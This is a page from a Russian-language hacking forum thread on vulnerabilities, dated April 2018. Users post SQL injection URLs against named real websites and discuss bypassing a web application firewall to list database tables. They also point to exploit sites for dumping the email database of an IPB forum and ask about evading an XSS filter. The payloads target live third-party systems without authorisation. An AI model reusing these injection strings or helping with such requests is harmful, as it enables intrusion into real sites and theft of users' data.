HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 230 из 296 « Первая < 130180220 226 227 228 229 230 231 232 233 234 240280 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #2291  
Старый 17.04.2018, 02:07
Sensoft
Постоянный
Регистрация: 14.06.2015
Сообщений: 396
С нами: 5745206

Репутация: 1
По умолчанию
Цитата:
Сообщение от Muracha  

И почему не работает запрос, он же верный по своей структуре?
Spoiler: 1
http://wellaprof.elle.ru/competition?order_by=date&offset=1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(AES _DECRYPT(AES_ENCRYPT
(
TABLE_NAME
,0x71),0x71))))%2c1)
+FROM+INFORMATION_SCHEMA.TABLES
%20--%202
там waf
 
Ответить с цитированием

  #2292  
Старый 17.04.2018, 02:13
Muracha
Участник форума
Регистрация: 30.07.2011
Сообщений: 151
С нами: 7782806

Репутация: 0
По умолчанию
Цитата:
Сообщение от Sensoft  

там waf
ссылается на неверный запрос:

Вроде не waf, а я как-то неправильно составил запрос.

Допускается кстати и так но ошибка идиентичная

Код:
http://wellaprof.elle.ru/competition?order_by=date&offset=1%20procedure%20analyse(extractvalue(rand()%2cconcat(0x3a%2cCONCAT(TABLE_NAME)))%2c1)+from+information_schema.tables+where+table_schema!=0x696e666f726d6174696f6e5f736368656d61--%201
Цитата:
Сообщение от None  
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'from information_schema.tables where table_schema!=0x696e666f726d6174696f6e5f736' at line 1
Нашел интересную книгу

https://www.ptsecurity.com/upload/co...eev-CC-WAF.pdf

Попытался сделать по ней но тот же результат:

http://wellaprof.elle.ru/competition?order_by=date&offset=1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(TAB LE_NAME))),1)+ascii(lower(mid((from+information_sc hema.tables),1,1)))-- 1

По ней составил запрос для обхода WAF

Цитата:
Выводит значение XPATH syntax error: ':108'


А такое же значение как и (0x3a%2cCONCAT(TABLE_NAME)

Но понять не могу что фильтрует и как это обойти, чтобы вывести данные.



Цитата:
 
Ответить с цитированием

  #2293  
Старый 19.04.2018, 17:42
BabaDook
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
С нами: 5797046

Репутация: 40


По умолчанию
Помогите пожалуйста, никак не могу сделать это

Код:
http://www.alphaonenow.org/story.php?news_id=2 UnIoN  select 1,2,3+--+-
Никак не могу получить вывод.
 
Ответить с цитированием

  #2294  
Старый 20.04.2018, 12:02
Sensoft
Постоянный
Регистрация: 14.06.2015
Сообщений: 396
С нами: 5745206

Репутация: 1
По умолчанию
как прописать чтобы вызвать tables ?



DB_A2FF5A_icodatabase
 
Ответить с цитированием

  #2295  
Старый 20.04.2018, 16:14
BabaDook
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
С нами: 5797046

Репутация: 40


По умолчанию
Цитата:
Сообщение от Sensoft  

как прописать чтобы вызвать tables ?

DB_A2FF5A_icodatabase
Саня, загугли mssql injection
 
Ответить с цитированием

  #2296  
Старый 20.04.2018, 16:47
Sensoft
Постоянный
Регистрация: 14.06.2015
Сообщений: 396
С нами: 5745206

Репутация: 1
По умолчанию
Цитата:
Сообщение от BabaDook  

Саня, загугли mssql injection
Спасибо капитан очевидность.

Иди лучше дальше мёртвые сайты крути )
 
Ответить с цитированием

  #2297  
Старый 20.04.2018, 20:08
Notrak
Новичок
Регистрация: 12.04.2018
Сообщений: 3
С нами: 4257686

Репутация: 0
По умолчанию
Подскажите кто можете помочь с одного IPB форума (v 3.3.4) скачать БД емыйлов?

(пишите в личку)
 
Ответить с цитированием

  #2298  
Старый 20.04.2018, 20:24
Sensoft
Постоянный
Регистрация: 14.06.2015
Сообщений: 396
С нами: 5745206

Репутация: 1
По умолчанию
Цитата:
Сообщение от Notrak  

Подскажите кто можете помочь с одного IPB форума (v 3.3.4) скачать БД емыйлов?
(пишите в личку)
https://www.exploit-db.com

https://0day.today

Найдёшь тут эксплоит тебе повезло не найдёшь значит не повезло
 
Ответить с цитированием

  #2299  
Старый 21.04.2018, 15:41
karkajoi
Постоянный
Регистрация: 26.10.2016
Сообщений: 438
С нами: 5025206

Репутация: 5
По умолчанию
Цитата:
Сообщение от Sensoft  

https://www.exploit-db.com
https://0day.today
Найдёшь тут эксплоит тебе повезло не найдёшь значит не повезло
Он мне писал, у меня просто нету времени крутить, там есть sql inject и WAF
 
Ответить с цитированием

  #2300  
Старый 21.04.2018, 16:26
hn4sty
Новичок
Регистрация: 21.04.2018
Сообщений: 1
С нами: 4244726

Репутация: 0
По умолчанию
ребят, приветствую!

Можно ли как нибудь заюзать XSS если фильтруются <> , то есть = пустое место
 
Ответить с цитированием
Ответ
Страница 230 из 296 « Первая < 130180220 226 227 228 229 230 231 232 233 234 240280 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.